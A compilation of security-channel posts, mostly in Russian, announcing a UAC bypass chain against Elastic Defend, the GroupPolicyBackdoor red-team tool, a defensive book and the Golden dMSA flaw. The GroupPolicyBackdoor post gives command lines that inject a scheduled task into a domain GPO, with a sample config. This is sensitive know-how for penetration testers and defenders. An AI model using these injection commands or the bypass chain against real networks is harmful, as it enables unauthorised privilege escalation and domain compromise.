💻 Elastic Defend Bypass: UAC Bypass Chain Leading To Silent Elevation

A chained technique has been identified that allows a local, unprivileged attacker to achieve silent privilege escalation to administrator by bypassing protections enforced by Elastic Defend v9.0.4. The method leverages a trusted auto-elevated Windows binary (fodhelper.exe) in conjunction with a registry hijack and COM object execution, resulting in arbitrary code execution at elevated privileges - without triggering a UAC prompt or EDR detection

🔗 UAC Bypass
💻 Presentation

#uac #bypass #windows #lpe

✈️ Whitehat Lab 💬Chat

💻 GroupPolicyBackdoor

Инструмент пост эксплуатации для различных манипуляций с GPO. Написан на 😰 Python
Впервые представлена на DEFCON 33

Примеры:

#backup
python3 gpb.py restore backup -d 'corp.com' -o './my_backups' --dc ad01-dc.corp.com -u 'john' -p 'Password1!' -n 'TARGET_GPO'

#inject
python3 gpb.py gpo inject --domain 'corp.com' --dc 'ad01-dc.corp.com' -k --module modules_templates/ImmediateTask_create.ini --gpo-name 'TARGET_GPO'

Пример ini:

[MODULECONFIG]
name = Scheduled Tasks
type = computer

[MODULEOPTIONS]
task_type = immediate
program = cmd.exe
arguments = /c "whoami > C:\Temp\poc.txt"

[MODULEFILTERS]
filters =
    [{
        "operator": "AND",
        "type": "Computer Name",
        "value": "ad01-srv1.corp.com"
    }]

GPO creation, deletion, backup and injections
Various injectable configurations, with, for each, customizable options (see list in the wiki)
Possibility to remove injected configurations from the target GPO
Possibility to revert the actions performed on client devices
GPO links manipulation
GPO enumeration / user privileges enumeration on GPOs

💻 Repo
📔 Docs

#gpo #redteam #windows

✈️ Whitehat Lab 💬Chat

The Defender’s Advantage — это книга от Google Cloud и Mandiant о том, как защитникам использовать своё ключевое преимущество: знание собственной инфраструктуры. В ней собраны практики по шести ключевым направлениям (разведка, обнаружение, реагирование, валидация, охота, управление), которые помогают выстраивать системную и проактивную киберзащиту.

🔗 https://cloud.google.com/security/resources/defenders-advantage

🦔THF

#tools

Golden DMSA 💻

В новой версии Windows Server 2025 обнаружена уязвимость Golden dMSA.

🔤 Проблема кроется в архитектуре функции Delegated Managed Service Accounts (dMSA), предназначенной для безопасной замены устаревших сервисных учётных записей. Microsoft внедрила dMSA как способ противодействия атакам Kerberoasting, при которых злоумышленники получают хэши паролей сервисов через Kerberos-билеты. Нововведение позволяет привязывать сервисную учётную запись строго к конкретному устройству в домене, исключая возможность её кражи или использования с других машин.

Однако выяснилось, что в конструкции, отвечающей за генерацию паролей для этих учётных записей, используется структура с предсказуемыми компонентами. Время инициализации учитывается с точностью до секунды, а общее количество возможных комбинаций ограничено 1024. Это делает атаку методом перебора крайне простой — при наличии исходного криптографического материала.

🔤 Американская компания Semperis выпустила открытый инструмент для демонстрации атаки Golden dMSA. По словам авторов, даже единичная успешная атака может привести к установлению долговременного контроля над всеми сервисами в корпоративной сети, поскольку полученный доступ фактически не имеет срока действия.